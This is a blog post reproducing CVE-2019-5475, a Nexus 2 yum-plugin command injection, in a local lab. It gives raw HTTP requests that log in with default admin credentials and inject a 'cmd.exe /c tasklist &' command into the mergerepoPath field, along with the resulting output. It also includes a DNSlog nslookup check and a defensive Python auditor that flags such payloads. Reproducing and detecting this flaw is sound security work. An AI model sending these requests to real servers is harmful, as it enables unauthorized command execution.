Neurohazard

CVE-2019-5475: Nexus 2 yum plugin RCE reproduction

wpadmin, September 23, 2019, InfoSec


References

[Vulnerability analysis] CVE-2019-5475: Nexus 2 yum plugin remote command execution vulnerability
https://mp.weixin.qq.com/s/E_BEp-yYKtIYAnQ6JP7fmg

CVE-2019-5475: Nexus 2 yum plugin RCE reproduction
https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483738&idx=1&sn=6bce2bf153ab0a07c01f746d479644d4&scene=0#wechat_redirect

Environment setup

(Windows is used as the example)

1. Download Nexus 2.14.13:
https://download.sonatype.com/nexus/oss/nexus-2.14.13-01-bundle.zip

2. Run bin/jsw/windows-x86-64/install-nexus.bat (as administrator)

3. Run bin/jsw/windows-x86-64/start-nexus.bat (as administrator)
[Startup is fairly slow; please be patient]

Debugging reference:
https://blog.csdn.net/nthack5730/article/details/51082270

4. Visit http://localhost:8081/nexus to verify that the service is up
(default credentials: admin/admin123)

PoC

The vulnerability requires administrator privileges, so it is a post-authentication RCE (an authenticated "getshell" from the admin console).

A demo using tasklist (the value placed in the mergerepoPath field):
C:\Windows\System32\cmd.exe /c C:\Windows\System32\tasklist.exe &

Raw HTTP request

PUT /nexus/service/siesta/capabilities/00014aeb0e511dc9 HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json,application/vnd.siesta-error-v1+json,application/vnd.siesta-validation-errors-v1+json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Nexus-UI: true
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 323
Connection: close
Referer: http://127.0.0.1:8081/nexus/
Cookie: NXSESSIONID=8c404e22-d87d-4563-926c-d5fbac516139

{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"1"},{"key":"mergerepoPath","value":"C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\System32\\tasklist.exe &"}],"id":"00014aeb0e511dc9","notes":"Automatically added on Sun Sep 22 19:58:00 CST 2019"}

Part of the response contains "System Idle Process", which can be used as the confirmation keyword. Alternatively, DNSlog-based detection can be used with C:\Windows\System32\nslookup.exe <prefix>.dnslog.org

System Idle Process              0 Services                   0          8 K
System                           4 Services                   0      3,424 K
Registry                       120 Services                   0     93,616 K
smss.exe                       420 Services                   0      1,008 K
csrss.exe                      616 Services                   0      5,356 K
wininit.exe                    716 Services                   0      5,964 K
services.exe                   788 Services                   0      8,712 K
lsass.exe                      808 Services                   0     21,068 K
svchost.exe                    916 Services                   0      3,200 K
svchost.exe                    940 Services                   0     29,792 K
fontdrvhost.exe                964 Services                   0      2,360 K
svchost.exe                    528 Services                   0     17,628 K
svchost.exe                   1044 Services                   0      7,448 K
svchost.exe                   1316 Services                   0      8,872 K
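The request above is the whole exploit: an administrator-level PUT to the capabilities endpoint that repoints the yum capability's createrepoPath/mergerepoPath at an arbitrary command line. As an added defensive example (not code from the original post or from Sonatype), the following audits a capability JSON body, or a raw captured request as shown above, and flags path properties that contain shell metacharacters or do not name the createrepo/mergerepo tools. The sample request and benign body are constructed here; the function names are my own.

```python
import json
import re

# Shell operators, redirection, substitution and whitespace never belong in a
# plain path to the createrepo/mergerepo binaries the yum capability points at.
SHELL_META = re.compile(r"[&|;`$<>\s]")
EXPECTED_TOOL = {"createrepoPath": "createrepo", "mergerepoPath": "mergerepo"}

def audit_yum_capability(body: str) -> list:
    """Return findings for a Nexus 2 capability JSON body (empty list = clean)."""
    try:
        cap = json.loads(body)
    except json.JSONDecodeError as exc:
        return [f"unparseable capability body: {exc}"]
    if cap.get("typeId") != "yum":
        return []
    findings = []
    for prop in cap.get("properties", []):
        key, value = prop.get("key"), str(prop.get("value", ""))
        if key not in EXPECTED_TOOL:
            continue
        if SHELL_META.search(value):
            findings.append(f"{key}: shell metacharacters/whitespace in {value!r}")
        basename = re.split(r"[\\/]", value)[-1].lower()  # Windows or POSIX separators
        if not basename.startswith(EXPECTED_TOOL[key]):
            findings.append(f"{key}: unexpected executable {basename!r}")
    return findings

def audit_request(raw: str) -> list:
    """Audit a raw HTTP request (e.g. from a proxy log) that edits a capability."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    head, _, body = raw.partition(sep)
    method, target = head.splitlines()[0].split(" ")[:2]
    if method not in ("PUT", "POST") or "/service/siesta/capabilities" not in target:
        return []
    return audit_yum_capability(body)

# Constructed sample: the write-up's request with headers trimmed (JSON keeps "\\").
SAMPLE_REQUEST = (
    "PUT /nexus/service/siesta/capabilities/00014aeb0e511dc9 HTTP/1.1\n"
    "Host: 127.0.0.1:8081\nContent-Type: application/json\n\n"
    '{"typeId":"yum","enabled":true,"properties":[{"key":"createrepoPath","value":"1"},'
    '{"key":"mergerepoPath","value":"C:\\\\Windows\\\\System32\\\\cmd.exe /c '
    'C:\\\\Windows\\\\System32\\\\tasklist.exe &"}]}'
)
# Constructed benign body: both properties point at the real tools.
BENIGN_BODY = ('{"typeId":"yum","properties":[{"key":"createrepoPath","value":"/usr/bin/createrepo"},'
               '{"key":"mergerepoPath","value":"/usr/bin/mergerepo"}]}')

if __name__ == "__main__":
    print(audit_request(SAMPLE_REQUEST), audit_yum_capability(BENIGN_BODY))
```

The sample request yields three findings (a bogus createrepoPath of "1", plus metacharacters and a wrong executable in mergerepoPath), while the benign body yields none.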

Login process

Log in using HTTP Basic Auth.

GET /nexus/service/local/authentication/login?_dc=1569208667717 HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json,application/vnd.siesta-error-v1+json,application/vnd.siesta-validation-errors-v1+json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4xMjM=
X-Nexus-UI: true
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://127.0.0.1:8081/nexus/

Partial response. The confirmation keyword can be "loggedIn":true; a failed login generally returns a 401 page.

HTTP/1.1 200 OK
Date: Mon, 23 Sep 2019 03:21:14 GMT
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Set-Cookie: NXSESSIONID=8c404e22-d87d-4563-926c-d5fbac516139; Path=/nexus; HttpOnly
Server: Nexus/2.14.13-01 Noelios-Restlet-Engine/1.1.6-SONATYPE-5348-V8
Content-Type: application/json; charset=UTF-8
Vary: Accept-Charset, Accept-Encoding, Accept-Language, Accept
Content-Length: 2554
Connection: close

{"data":{"clientPermissions":{"loggedIn":true,"loggedInUsername":"admin","loggedInUserSource":"default","permissions":[{"id":"nexus:pluginconsoleplugininfos","value":15},{"id":"security:users","value":15},{"id":"nexus:cache","value":15},{"id":"nexus:wonderland","value":15},{"id":"nexus:wastebasket","value":15},{"id":"nexus:ldapconninfo","value":15},{"id":"nexus:componentscontentclasses","value":15},{"id":"nexus:index","value":15},{"id":"nexus:analytics","value":15},{"id":"nexus:identify","value":15},{"id":"security:roles","value":15},{"id":"nexus:ldapuserrolemap","value":15},{"id":"nexus:repositorymirrorsstatus","value":15},{"id":"nexus:browseremote","value":15},{"id":"nexus:repotemplates","value":15},{"id":"nexus:ldaptestauth","value":15},{"id":"security:*","value":15},{"id":"nexus:configuration","value":15},{"id":"nexus:componentscheduletypes","value":15},{"id":"nexus:repositories","value":15},{"id":"nexus:healthcheck","value":15},{"id":"security:usersforgotid","value":15},{"id":"nexus:yumAlias","value":15},{"id":"nexus:status","value":15},{"id":"nexus:metrics-endpoints","value":15},{"id":"nexus:repostatus","value":15},{"id":"nexus:feeds","value":15},{"id":"security:componentsuserlocatortypes","value":15},{"id":"nexus:repositorymirrors","value":15},{"id":"nexus:tasksrun","value":15},{"id":"nexus:yumVersionedRepositories","value":15},{"id":"nexus:targets","value":15},{"id":"nexus:healthchecksummary","value":15},{"id":"nexus:logs","value":15},{"id":"nexus:metadata","value":15},{"id":"nexus:repometa","value":15},{"id":"nexus:repositorypredefinedmirrors","value":15},{"id":"security:userschangepw","value":15},{"id":"nexus:routes","value":15},{"id":"nexus:ldaptestuserconf","value":15},{"id":"nexus:componentrealmtypes","value":15},{"id":"nexus:capabilityTypes","value":15},{"id":"nexus:capabilities","value":15},{"id":"nexus:attributes","value":15},{"id":"nexus:ldapusergroupconf","value":15},{"id":"security:usersforgotpw","value":15},{"id":"nexus:repogroups","value":15},{"id":"nexus:command","value":15},{"id":"nexus:tasks","value":15},{"id":"apikey:access","value":15},{"id":"nexus:artifact","value":15},{"id":"security:usersreset","value":15},{"id":"nexus:logconfig","value":15},{"id":"security:userssetpw","value":15},{"id":"nexus:tasktypes","value":15},{"id":"security:privilegetypes","value":15},{"id":"nexus:settings","value":15},{"id":"security:privileges","value":15},{"id":"nexus:*","value":15},{"id":"nexus:authentication","value":15},{"id":"nexus:componentsrepotypes","value":15},{"id":"nexus:atlas","value":15}]}}}

Response on failed login

HTTP/1.1 401 Unauthorized
Date: Mon, 23 Sep 2019 03:38:22 GMT
Server: Nexus/2.14.13-01
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Type: text/html
Connection: close

<html>
  <head>
    <title>Access Denied</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>

    <link rel="icon" type="image/png" href="http://127.0.0.1:8081/nexus/favicon.png">
    <!--[if IE]>
    <link rel="SHORTCUT ICON" href="http://127.0.0.1:8081/nexus/favicon.ico"/>
    <![endif]-->

    <link rel="stylesheet" href="http://127.0.0.1:8081/nexus/static/css/Sonatype-content.css?2.14.13-01" type="text/css" media="screen" title="no title" charset="utf-8">
  </head>
  <body>
    <h1>Access Denied</h1>
    <p>
      Please <a href="http://127.0.0.1:8081/nexus">login</a> before attempting further requests.
    </p>
  </body>
</html>

References

CVE-2019-5475: Nexus 2 yum plugin RCE reproduction
https://cloud.tencent.com/developer/article/1513172

https://qiita.com/shimizukawasaki/items/12f0b69945498e6d5aa9
https://mp.weixin.qq.com/s/E_BEp-yYKtIYAnQ6JP7fmg
https://github.com/shadowsock5/Poc/blob/3b6be229acce3cbc309a6879969cf29750b14acb/nexes-manager/CVE-2019-5475.py
https://blog.spoock.com/2018/11/25/getshell-bypass-exec/

https://github.com/jaychouzzk/CVE-2019-5475-Nexus-Repository-Manager-
